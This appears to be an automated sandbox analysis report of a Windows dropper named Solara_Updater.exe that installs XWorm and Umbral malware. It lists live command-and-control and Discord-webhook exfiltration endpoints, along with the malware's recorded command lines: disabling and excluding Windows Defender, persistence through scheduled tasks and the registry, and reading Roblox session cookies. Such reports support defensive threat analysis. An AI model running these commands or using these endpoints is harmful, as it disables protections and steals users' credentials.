Analysis
  max time kernel: 150s
  max time network: 150s
  platform: windows7_x64
  resource: win7-20240508-en
  resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  submitted: 19-05-2024 16:15

  Static task: static1
  Behavioral task: behavioral1
    Sample: Solara_Updater.exe
    Resource: win7-20240508-en

General
  Target: Solara_Updater.exe
  Size: 1.9MB
  MD5: f4cffd7e6cca2b88bba1f19120e9255f
  SHA1: 28df62794d325206d1f61a400b5c5c682632e371
  SHA256: 4a10203f9773e4a4f5173a3d1840461bed2b6c206e16b47543bb127a541192bf
  SHA512: cb71ef2db087c012744fcac05033cab80947131029ae9bf59b57f85dd2f819e859f105919978a2af4334ac4b8f5b060f5f757b6898cb8fddd720a114b652bfe8
  SSDEEP: 49152:mH4Y2d/Pz0dB5h1qeU2V0ZBsvH1jBOtGQt/3c5DGqHQX+icSr:mH/QPz0d/pV0AvHLDh5HH4+i

Malware Config
  Extracted: xworm
    answer-riverside.gl.at.ply.gg:45691
    Install_directory: %AppData%
    install_file: svhost.exe
  Extracted: umbral
    https://discordapp.com/api/webhooks/1239665745831530598/iJT0OELt4O4igXW_VMu-CUIfcqaawXLhyC4Bruuv1t2x0XOvC0_p9dc-G_RxJMO7fn-V
Signatures

Detect Umbral payload 7 IoCs
  resource | yara_rule
  behavioral1/files/0x0007000000015cf0-47.dat | family_umbral
  behavioral1/memory/276-49-0x0000000001210000-0x0000000001250000-memory.dmp | family_umbral
  behavioral1/memory/2660-276-0x0000000000110000-0x0000000000150000-memory.dmp | family_umbral
  behavioral1/memory/2872-337-0x0000000000D00000-0x0000000000D40000-memory.dmp | family_umbral
  behavioral1/memory/2236-381-0x0000000000370000-0x00000000003B0000-memory.dmp | family_umbral
  behavioral1/memory/2268-497-0x0000000000800000-0x0000000000840000-memory.dmp | family_umbral
  behavioral1/memory/484-600-0x0000000000E30000-0x0000000000E70000-memory.dmp | family_umbral

Detect Xworm Payload 4 IoCs
  resource | yara_rule
  behavioral1/files/0x0009000000015ce8-41.dat | family_xworm
  behavioral1/memory/1956-48-0x0000000000D40000-0x0000000000D56000-memory.dmp | family_xworm
  behavioral1/memory/2136-403-0x0000000001250000-0x0000000001266000-memory.dmp | family_xworm
  behavioral1/memory/2704-588-0x0000000000140000-0x0000000000156000-memory.dmp | family_xworm

Modifies WinLogon for persistence 2 TTPs 6 IoCs
  description | ioc | Process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\taskhost.exe\"" | bridgeblockportComBroker.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\taskhost.exe\", \"C:\\Recovery\\8f60a382-0d98-11ef-817d-5aba25856535\\wscript.exe\"" | bridgeblockportComBroker.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\taskhost.exe\", \"C:\\Recovery\\8f60a382-0d98-11ef-817d-5aba25856535\\wscript.exe\", \"C:\\Program Files\\7-Zip\\Loader.exe\"" | bridgeblockportComBroker.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\taskhost.exe\", \"C:\\Recovery\\8f60a382-0d98-11ef-817d-5aba25856535\\wscript.exe\", \"C:\\Program Files\\7-Zip\\Loader.exe\", \"C:\\Program Files\\Windows Mail\\en-US\\sppsvc.exe\"" | bridgeblockportComBroker.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\taskhost.exe\", \"C:\\Recovery\\8f60a382-0d98-11ef-817d-5aba25856535\\wscript.exe\", \"C:\\Program Files\\7-Zip\\Loader.exe\", \"C:\\Program Files\\Windows Mail\\en-US\\sppsvc.exe\", \"C:\\Windows\\PCHEALTH\\ERRORREP\\QHEADLES\\System.exe\"" | bridgeblockportComBroker.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\taskhost.exe\", \"C:\\Recovery\\8f60a382-0d98-11ef-817d-5aba25856535\\wscript.exe\", \"C:\\Program Files\\7-Zip\\Loader.exe\", \"C:\\Program Files\\Windows Mail\\en-US\\sppsvc.exe\", \"C:\\Windows\\PCHEALTH\\ERRORREP\\QHEADLES\\System.exe\", \"C:\\hostNet\\bridgeblockportComBroker.exe\"" | bridgeblockportComBroker.exe
Process spawned unexpected child process 18 IoCs
  This typically indicates the parent process was compromised via an exploit or macro.
  description (same for every row): Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
  pid | pid_target | Process | procid_target
  948 | 1196 | schtasks.exe | 23
  1328 | 1196 | schtasks.exe | 23
  1788 | 1196 | schtasks.exe | 23
  2544 | 1196 | schtasks.exe | 23
  2680 | 1196 | schtasks.exe | 23
  1800 | 1196 | schtasks.exe | 23
  2424 | 1196 | schtasks.exe | 23
  2644 | 1196 | schtasks.exe | 23
  1264 | 1196 | schtasks.exe | 23
  2904 | 1196 | schtasks.exe | 23
  2716 | 1196 | schtasks.exe | 23
  2700 | 1196 | schtasks.exe | 23
  264 | 1196 | schtasks.exe | 23
  628 | 1196 | schtasks.exe | 23
  696 | 1196 | schtasks.exe | 23
  2976 | 1196 | schtasks.exe | 23
  1452 | 1196 | schtasks.exe | 23
  1676 | 1196 | schtasks.exe | 23

Blocklisted process makes network request 1 IoCs
  flow | pid | Process
  34 | 1992 | Loader.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
  Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid | Process
  2812 | powershell.exe
  1624 | powershell.exe
  2532 | powershell.exe
  2884 | powershell.exe
  2516 | powershell.exe
  808 | powershell.exe
  2136 | powershell.exe
  1632 | powershell.exe
  2656 | powershell.exe

Drops file in Drivers directory 5 IoCs
  description | ioc | Process
  File opened for modification | C:\Windows\System32\drivers\etc\hosts | RustCheat.exe
  File opened for modification | C:\Windows\System32\drivers\etc\hosts | RustCheat.exe
  File opened for modification | C:\Windows\System32\drivers\etc\hosts | RustCheat.exe
  File opened for modification | C:\Windows\System32\drivers\etc\hosts | RustCheat.exe
  File opened for modification | C:\Windows\System32\drivers\etc\hosts | RustCheat.exe

Drops startup file 2 IoCs
  description | ioc | Process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk | XClient.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk | XClient.exe
Executes dropped EXE 64 IoCs
  Process | pids (in the order recorded)
  Loader.exe | 2888, 2604, 1616, 2316, 2528, 948, 2112, 2596, 2676, 2696, 2496, 2768, 1792, 1864, 2144, 1612, 2564, 948, 1476, 1752, 1660, 2284, 2748
  sol.exe | 2160, 2640, 2772, 764, 1528, 3040, 2812, 2992, 1152, 1664, 288, 332, 2812, 796, 496, 1152, 1660, 1536, 876, 2912, 2308, 2880, 1508
  XClient.exe | 1956, 2584, 1148
  RustCheat.exe | 276, 2096, 2660
  bridgeblockportComBroker.exe | 1680, 2792, 1852, 2440, 2836, 2156, 1976, 2980, 1444, 2552, 3040
  sppsvc.exe | 760

Loads dropped DLL 58 IoCs
  Process | pids (in the order recorded)
  cmd.exe | 2100, 2100, 2928, 2600, 1212, 1228, 2816, 2116, 2196, 1940, 768, 1912, 2580, 3060, 1116, 2480, 2152, 2696, 668, 2752, 2336, 884, 1800, 1740, 1856, 2232, 2580, 2968, 1872, 1296, 2716, 1028, 316, 540, 2020, 1720, 2760, 1560, 1852, 1648, 2416, 2092, 1728, 468, 1932, 316, 2760, 1856, 2720, 1208, 2544, 2304, 2532, 2868, 2908, 2896, 2564, 668
Reads user/profile data of web browsers 2 TTPs
  Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application 2 TTPs 13 IoCs
  description | ioc | Process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" | bridgeblockportComBroker.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Recovery\\8f60a382-0d98-11ef-817d-5aba25856535\\wscript.exe\"" | bridgeblockportComBroker.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Windows\\PCHEALTH\\ERRORREP\\QHEADLES\\System.exe\"" | bridgeblockportComBroker.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Windows\\PCHEALTH\\ERRORREP\\QHEADLES\\System.exe\"" | bridgeblockportComBroker.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Recovery\\8f60a382-0d98-11ef-817d-5aba25856535\\wscript.exe\"" | bridgeblockportComBroker.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files\\Windows Mail\\en-US\\sppsvc.exe\"" | bridgeblockportComBroker.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files\\Windows Mail\\en-US\\sppsvc.exe\"" | bridgeblockportComBroker.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" | bridgeblockportComBroker.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\hostNet\\taskhost.exe\"" | bridgeblockportComBroker.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\Loader = "\"C:\\Program Files\\7-Zip\\Loader.exe\"" | bridgeblockportComBroker.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Loader = "\"C:\\Program Files\\7-Zip\\Loader.exe\"" | bridgeblockportComBroker.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\hostNet\\taskhost.exe\"" | bridgeblockportComBroker.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe" | XClient.exe

Looks up external IP address via web service 9 IoCs
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  33 | ip-api.com
  44 | ip-api.com
  57 | ip-api.com
  2 | ip-api.com
  10 | ipinfo.io
  13 | ip-api.com
  27 | ip-api.com
  59 | ip-api.com
  9 | ipinfo.io

Drops file in System32 directory 2 IoCs
  description | ioc | Process
  File created | \??\c:\Windows\System32\bsgne1.exe | csc.exe
  File created | \??\c:\Windows\System32\CSC2FEC2B28D6C643E49C6489917F1F18A0.TMP | csc.exe

Drops file in Program Files directory 4 IoCs
  description | ioc | Process
  File created | C:\Program Files\Windows Mail\en-US\sppsvc.exe | bridgeblockportComBroker.exe
  File created | C:\Program Files\Windows Mail\en-US\0a1fd5f707cd16 | bridgeblockportComBroker.exe
  File created | C:\Program Files\7-Zip\Loader.exe | bridgeblockportComBroker.exe
  File created | C:\Program Files\7-Zip\87ba48885c7d9e | bridgeblockportComBroker.exe

Drops file in Windows directory 3 IoCs
  description | ioc | Process
  File created | C:\Windows\PCHEALTH\ERRORREP\QHEADLES\System.exe | bridgeblockportComBroker.exe
  File opened for modification | C:\Windows\PCHEALTH\ERRORREP\QHEADLES\System.exe | bridgeblockportComBroker.exe
  File created | C:\Windows\PCHEALTH\ERRORREP\QHEADLES\27d1bcfc3c54e0 | bridgeblockportComBroker.exe

Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) 1 TTPs 19 IoCs
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Process | pids (in the order recorded)
  schtasks.exe | 1452, 1800, 2424, 2904, 2976, 2256, 1328, 1788, 2700, 264, 2716, 696, 948, 2544, 2644, 1264, 2680, 628, 1676
Detects videocard installed 1 TTPs 5 IoCs
  Uses WMIC.exe to determine videocard installed.
  Process | pids
  wmic.exe | 2564, 2580, 2012, 2408, 1648

Modifies system certificate store 2 IoCs
  description | ioc | Process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | bridgeblockportComBroker.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [certificate blob omitted] | bridgeblockportComBroker.exe

Runs ping.exe 1 TTPs 6 IoCs
  Process | pids
  PING.EXE | 996, 1140, 2940, 2916, 668, 2408

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  pid | Process
  760 | sppsvc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs
  pid | Process
  1680 | bridgeblockportComBroker.exe (the same entry is recorded 64 times)
Suspicious use of AdjustPrivilegeToken 64 IoCs
  pid | Process | Token(s)
  2888 | Loader.exe | SeDebugPrivilege
  1956 | XClient.exe | SeDebugPrivilege
  276 | RustCheat.exe | SeDebugPrivilege
  2376 | wmic.exe | SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35 (this full set is recorded twice)
  1616 | Loader.exe | SeDebugPrivilege
  1680 | bridgeblockportComBroker.exe | SeDebugPrivilege
  2792 | bridgeblockportComBroker.exe | SeDebugPrivilege
  2516 | powershell.exe | SeDebugPrivilege
  2584 | XClient.exe | SeDebugPrivilege
  1620 | powershell.exe | SeDebugPrivilege
  1924 | powershell.exe | SeDebugPrivilege
  2604 | powershell.exe | SeDebugPrivilege
  1792 | Loader.exe | SeDebugPrivilege
  2772 | wmic.exe | SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege

Suspicious use of WriteProcessMemory 64 IoCs
  description | pid | Process | procid_target (identical repeated events collapsed into one row)
  PID 2136 wrote to memory of 2888 | 2136 | Solara_Updater.exe | 29
  PID 2136 wrote to memory of 2160 | 2136 | Solara_Updater.exe | 30
  PID 2136 wrote to memory of 1152 | 2136 | Solara_Updater.exe | 31
  PID 2160 wrote to memory of 2828 | 2160 | sol.exe | 32
  PID 1152 wrote to memory of 2604 | 1152 | Solara_Updater.exe | 33
  PID 1152 wrote to memory of 2640 | 1152 | Solara_Updater.exe | 34
  PID 1152 wrote to memory of 2484 | 1152 | Solara_Updater.exe | 35
  PID 2640 wrote to memory of 1348 | 2640 | sol.exe | 36
  PID 2484 wrote to memory of 1616 | 2484 | Solara_Updater.exe | 37
  PID 2484 wrote to memory of 2772 | 2484 | Solara_Updater.exe | 38
  PID 2484 wrote to memory of 2768 | 2484 | Solara_Updater.exe | 39
  PID 2772 wrote to memory of 1624 | 2772 | sol.exe | 40
  PID 2888 wrote to memory of 1956 | 2888 | Loader.exe | 41
  PID 2888 wrote to memory of 276 | 2888 | Loader.exe | 42
  PID 276 wrote to memory of 2376 | 276 | RustCheat.exe | 43
  PID 2768 wrote to memory of 2316 | 2768 | Solara_Updater.exe | 45
  PID 2768 wrote to memory of 764 | 2768 | Solara_Updater.exe | 46
  PID 2768 wrote to memory of 2856 | 2768 | Solara_Updater.exe | 47
  PID 764 wrote to memory of 536 | 764 | sol.exe | 48

Uses Task Scheduler COM API 1 TTPs
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Views/modifies file attributes 1 TTPs 5 IoCs
  Process | pids
  attrib.exe | 2804, 836, 1740, 644, 1792
Processes
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:1956 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:2136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:1632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:2812
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"4⤵
- Creates scheduled task(s)
PID:2256
-
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:276 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2376
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"4⤵
- Views/modifies file attributes
PID:2804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵PID:2516
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:2612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵PID:2648
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:2564
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause4⤵PID:448
-
C:\Windows\system32\PING.EXEping localhost5⤵
- Runs ping.exe
PID:1140
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"3⤵PID:2828
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "4⤵
- Loads dropped DLL
PID:2100 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"5⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1680 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f4mf1g3z\f4mf1g3z.cmdline"6⤵
- Drops file in System32 directory
PID:2880 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8E99.tmp" "c:\Windows\System32\CSC2FEC2B28D6C643E49C6489917F1F18A0.TMP"7⤵PID:2632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Sybwy7Zv6j.bat"6⤵PID:2152
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:2964
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- Runs ping.exe
PID:996
-
-
C:\Program Files\Windows Mail\en-US\sppsvc.exe"C:\Program Files\Windows Mail\en-US\sppsvc.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:760
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"3⤵
- Executes dropped EXE
PID:2604
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"4⤵PID:1348
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "5⤵
- Loads dropped DLL
PID:2928 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
-
-
-
[3] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:2484
    - Suspicious use of WriteProcessMemory
[4] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:1616
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
[5] C:\Users\Admin\AppData\Local\Temp\XClient.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\XClient.exe"  PID:2584
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
[5] C:\Users\Admin\AppData\Local\Temp\RustCheat.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"  PID:2096
    - Executes dropped EXE
[4] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:2772
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
[5] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:1624
[6] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:2600
    - Loads dropped DLL
[7] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:1852
    - Executes dropped EXE
[4] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:2768
    - Suspicious use of WriteProcessMemory
[5] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:2316
    - Executes dropped EXE
[5] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:764
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
[6] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:536
[7] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:1212
    - Loads dropped DLL
[8] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:2440
    - Executes dropped EXE
[5] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:2856
[6] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:2528
    - Executes dropped EXE
[6] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:1528
    - Executes dropped EXE
[7] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:2536
[8] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:1228
    - Loads dropped DLL
[9] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:2836
    - Executes dropped EXE
[6] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:448
[7] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:948
    - Executes dropped EXE
[7] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:3040
    - Executes dropped EXE
[8] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:2364
[9] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:2816
    - Loads dropped DLL
